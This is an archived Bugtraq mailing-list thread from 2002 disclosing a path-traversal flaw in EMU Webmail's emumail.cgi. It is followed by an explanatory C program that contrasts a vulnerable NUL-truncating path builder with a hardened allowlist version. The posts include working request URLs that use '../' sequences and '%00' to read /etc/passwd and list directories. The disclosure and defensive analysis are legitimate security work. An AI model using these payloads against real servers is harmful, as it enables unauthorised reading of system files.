[25003] in bugtraq


Re: emumail.cgi

daemon@ATHENA.MIT.EDU (MegaHz)
Mon Apr 8 23:37:08 2002

Message-ID: <00e801c1dd68$11f2d9f0$0100a8c0@MEGAHZ>
From: "MegaHz" <admin@cyhackportal.com>
To: <bugtraq@securityfocus.com>
Cc: "N|ghtHawk" <nighthawk@hackers4hackers.nl>
Date: Sat, 6 Apr 2002 15:39:15 +0300
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

You can also do this:
http://site/emumail.cgi?type=/../../../../../etc/passwd%00

But you cannot do this:
http://site/emumail.cgi?type=/../../../../../bin/ls%20/%00

/* 
 * Andreas Constantinides (MegaHz)
 * Admin of cHp (www.cyhackportal.com)
 *
 */


----- Original Message ----- 
From: "N|ghtHawk" <nighthawk@hackers4hackers.nl>
To: <bugtraq@securityfocus.org>
Sent: Friday, April 05, 2002 3:10 AM
Subject: Re: emumail.cgi


> >name            : emumail.cgi
> >date            : 04/04/2002
> >description     : EMU Webmail: how to check your email
> >from the web. 
> >severity        : Low/average-risk
> >homepage        : www.emumail.com
> >
> >Any user can view files on the remote system:
> >xxx/PATH/emumail.cgi?type=FILE%00
> >
> >
> >
> >The vendor was contacted about that.
> >
> 
> http://site/emumail.cgi?type=.%00
> 
> Seems to give the directory index of the current directory.
> 
> http://site/emumail.cgi?type=..%00
> 
> Seems to give the directory index of ../
> 
> -- 
> N|ghtHawk
> http://www.hackers4hackers.org
> 
> 
> 
> 
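What the three URLs in this thread exercise is a NUL-byte truncation: the CGI appends its own suffix to the user-supplied `type` value, but the open(2) call underneath stops at the `%00`, so the script's suffix never reaches the kernel and `type` becomes an arbitrary path. The `ls` attempt fails because the parameter only ever goes to a file open, not to a shell. The following C program, added here as an illustration and not taken from EMU Webmail or from either poster, models that string handling with an assumed template directory (`/usr/local/emumail/templates`) and suffix (`.html`), and puts a hardened builder beside it; the function names are mine.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Assumed layout for the demonstration; not taken from the real EMU Webmail code. */
#define TEMPLATE_DIR "/usr/local/emumail/templates"
#define SUFFIX       ".html"

static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    c = tolower(c);
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;
}

/* Decode a query-string value (%XX escapes, '+' for space) into raw bytes.
 * Returns the number of decoded bytes; %00 becomes a real NUL byte that is
 * counted, so callers must not rely on strlen() to find the end. A NUL is
 * also written at out[n] so the buffer is usable as a C string when it
 * contains no embedded NUL. */
size_t url_decode(const char *in, unsigned char *out, size_t outsz)
{
    size_t n = 0;
    for (size_t i = 0; in[i] != '\0' && n + 1 < outsz; i++) {
        int h1 = hexval((unsigned char)in[i + 1]);
        int h2 = (h1 >= 0) ? hexval((unsigned char)in[i + 2]) : -1;
        if (in[i] == '%' && h1 >= 0 && h2 >= 0) {
            out[n++] = (unsigned char)(h1 * 16 + h2);
            i += 2;
        } else if (in[i] == '+') {
            out[n++] = ' ';
        } else {
            out[n++] = (unsigned char)in[i];
        }
    }
    out[n] = '\0';
    return n;
}

/* Vulnerable builder. Mirrors what a Perl CGI does with "$dir/$type$suffix":
 * the language string keeps every byte, NUL included, and the suffix is
 * appended after it. The open(2) underneath reads a C string, so everything
 * from the NUL onward, suffix included, is invisible to the kernel.
 * Returns the number of bytes the script thinks it built (0 on overflow). */
size_t build_path_vuln(const char *type_param, unsigned char *path, size_t pathsz)
{
    unsigned char buf[256];
    size_t n = url_decode(type_param, buf, sizeof buf);
    size_t dlen = strlen(TEMPLATE_DIR), slen = strlen(SUFFIX);
    if (dlen + 1 + n + slen + 1 > pathsz) return 0;
    size_t p = 0;
    memcpy(path + p, TEMPLATE_DIR, dlen); p += dlen;
    path[p++] = '/';
    memcpy(path + p, buf, n);             p += n;    /* BUG: embedded NUL copied verbatim */
    memcpy(path + p, SUFFIX, slen);       p += slen;
    path[p] = '\0';
    return p;
}

/* Hardened builder: work from the decoded byte count, reject an embedded NUL
 * and any byte that is not a plain template-name character. That also
 * rejects '/', '.' and ' ', so "..", "../" and "/bin/ls /" never reach the
 * filesystem. Returns 0 on success, -1 if the value is refused. */
int build_path_safe(const char *type_param, char *path, size_t pathsz)
{
    unsigned char buf[256];
    size_t n = url_decode(type_param, buf, sizeof buf);
    if (n == 0 || n > 64) return -1;
    if (memchr(buf, '\0', n) != NULL) return -1;      /* %00 */
    for (size_t i = 0; i < n; i++) {
        unsigned char c = buf[i];
        if (!(isalnum(c) || c == '_' || c == '-')) return -1;
    }
    int w = snprintf(path, pathsz, "%s/%s%s", TEMPLATE_DIR, (const char *)buf, SUFFIX);
    return (w < 0 || (size_t)w >= pathsz) ? -1 : 0;
}

int main(void)
{
    /* The three values from the thread plus a legitimate template name. */
    const char *inputs[] = { "inbox", "/../../../../../etc/passwd%00", "..%00", "/bin/ls%20/%00" };
    unsigned char raw[512];
    char safe[512];
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++) {
        build_path_vuln(inputs[i], raw, sizeof raw);
        printf("type=%-32s vulnerable open() sees: %s\n", inputs[i], (const char *)raw);
        if (build_path_safe(inputs[i], safe, sizeof safe) == 0)
            printf("%-37s hardened: %s\n", "", safe);
        else
            printf("%-37s hardened: rejected\n", "");
    }
    return 0;
}
```

Run as-is, the vulnerable builder turns `..%00` into an open of `.../templates/..`, which is the parent-directory listing N|ghtHawk saw, and turns the `/bin/ls%20/%00` value into an open of a file literally named `/bin/ls /`, which is why that request gives nothing: there is no command execution in this path. The allowlist is deliberately stricter than a `..` check alone; if the application has to accept dotted or nested names, the additional step is to resolve the final path with realpath(3) and confirm it still starts with the template directory before opening it.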